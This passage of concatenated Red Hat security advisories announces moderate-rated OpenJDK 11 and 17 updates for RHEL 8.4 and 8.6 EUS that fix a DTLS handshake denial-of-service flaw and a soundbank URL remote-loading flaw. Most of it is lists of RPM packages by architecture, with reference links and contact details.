java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_4.aarch64.rpm

ppc64le:  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_4.ppc64le.rpm

s390x:  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_4.s390x.rpm

x86_64:  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0198-01

Red Hat Security Advisory 2023-0199-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security update  
Advisory ID:       RHSA-2023:0199-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0199  
Issue date:        2023-01-18  
CVE Names:         CVE-2023-21835 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
(CVE-2023-21835)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2160421 - CVE-2023-21835 OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
java-11-openjdk-11.0.18.0.10-1.el8_6.src.rpm

aarch64:  
java-11-openjdk-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_6.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_6.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_6.s390x.rpm

x86_64:  
java-11-openjdk-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_6.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_6.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_6.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0199-01

Red Hat Security Advisory 2023-0190-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-17-openjdk security update  
Advisory ID:       RHSA-2023:0190-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0190  
Issue date:        2023-01-18  
CVE Names:         CVE-2023-21835 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
(CVE-2023-21835)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2160421 - CVE-2023-21835 OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
java-17-openjdk-17.0.6.0.10-2.el8_6.src.rpm

aarch64:  
java-17-openjdk-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-demo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-jmods-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-src-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-17.0.6.0.10-2.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-demo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-src-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.6.0.10-2.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-demo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-devel-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-headless-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-javadoc-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-jmods-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-src-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-static-libs-17.0.6.0.10-2.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-demo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-jmods-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-src-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-17.0.6.0.10-2.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
